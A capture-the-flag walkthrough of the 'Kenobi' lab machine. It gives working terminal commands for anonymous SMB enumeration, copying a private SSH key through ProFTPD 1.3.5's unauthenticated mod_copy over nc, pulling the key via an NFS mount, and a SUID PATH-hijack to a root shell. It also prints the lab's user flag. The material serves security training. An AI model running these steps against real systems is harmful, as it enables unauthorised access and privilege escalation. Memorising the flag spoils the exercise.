---
Kenobi is an Easy Linux machine that chains three separate vulnerabilities into a full compromise. An anonymous SMB share leaks the location of a private SSH key. ProFTPD 1.3.5's mod_copy module allows unauthenticated file copying, which is used to move the key somewhere NFS exports so it can be retrieved. The final escalation abuses a custom SUID binary that calls curl without a full path, making it vulnerable to PATH hijacking.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sV $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-14 18:02 UTC
Nmap scan report for $TARGET_IP
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100005)
Service Info: Host: KENOBI; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds
ProFTPD 1.3.5 is immediately worth noting — this version has a known unauthenticated file copy vulnerability in the mod_copy module. Ports 111 and 2049 confirm NFS is running, which becomes the retrieval mechanism. SMB on 139/445 is the first place to enumerate.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient -L //$TARGET_IP -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ smbclient //$TARGET_IP/anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 11:49:09 2019
.. D 0 Wed Sep 4 11:49:09 2019
log.txt N 12237 Wed Sep 4 11:49:09 2019
9204224 blocks of size 1024. 6877112 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (149.9 KiloBytes/sec) (average 149.9 KiloBytes/sec)
smb: \> bye
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
...
ProFTPD 1.3.5 Server 'ProFTPD Default Installation' [$TARGET_IP]
...
log.txt reveals:
kenobi at /home/kenobi/.ssh/id_rsakenobiThis gives us the exact path of the key to steal and confirms ProFTPD has read access to kenobi's home directory.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $TARGET_IP
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
/var is exported and mountable by anyone (*). The attack plan: use ProFTPD mod_copy to move the SSH key into /var/tmp, then retrieve it via the NFS mount.
ProFTPD 1.3.5 implements SITE CPFR (copy from) and SITE CPTO (copy to) commands in the mod_copy module. These commands work without any authentication in this version — any connection can copy files the FTP process can read. Connecting with nc directly lets us issue raw FTP protocol commands without an FTP client:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nc $TARGET_IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [$TARGET_IP]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
^C
The SSH key is now at /var/tmp/id_rsa — inside the NFS-exported /var tree.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ mount $TARGET_IP:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ ls /mnt/kenobiNFS/tmp/
id_rsa systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa /tmp/id_rsa
┌──(kali㉿kali)-[~]
└─$ chmod 600 /tmp/id_rsa
SSH requires private key files to be readable only by the owner (mode 600). Broader permissions cause SSH to reject the key: WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for 'id_rsa' are too open.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ ssh -i /tmp/id_rsa kenobi@$TARGET_IP
The authenticity of host '$TARGET_IP' can't be established.
ECDSA key fingerprint is SHA256:usjA5HAAS3h8dA4/D83q2O5Ib1IkxfYJKCNM2rJO5fk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$TARGET_IP' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
kenobi@kenobi:~$ cat /home/kenobi/user.txt
d0b0f3f53b6caa532a83915e19224899
Search for SUID binaries — executables that run as their owner regardless of who launches them:
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/menu is not a standard Linux binary. Inspect what it executes:
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
...
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
menu calls curl -I localhost, uname -r, and ifconfig — all by name without absolute paths like /usr/bin/curl. When a process calls a program by name only, the OS searches $PATH directories in order. Placing a malicious script named curl earlier in $PATH than the real curl causes menu to execute it — and because menu is SUID root, the spawned shell runs as root:
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo '/bin/sh' > curl
kenobi@kenobi:/tmp$ chmod +x curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=0(root) groups=0(root),1000(kenobi)
# cat /root/root.txt
$ROOT_FLAG
SITE CPFR/SITE CPTO allow unauthenticated file copying to anywhere the FTP process can write. Connecting with nc and issuing raw FTP commands is faster than searching for a packaged exploit.*. Port 111 reveals what is exported — run the nfs-showmount script immediately when you see rpcbind.chmod 600 on an SSH private key is not optional. SSH refuses to use keys with broader permissions.find / -perm -u=s -type f 2>/dev/null is the standard first command for Linux privilege escalation enumeration. Non-standard SUID binaries are always the priority to investigate.strings on the binary reveals what it calls.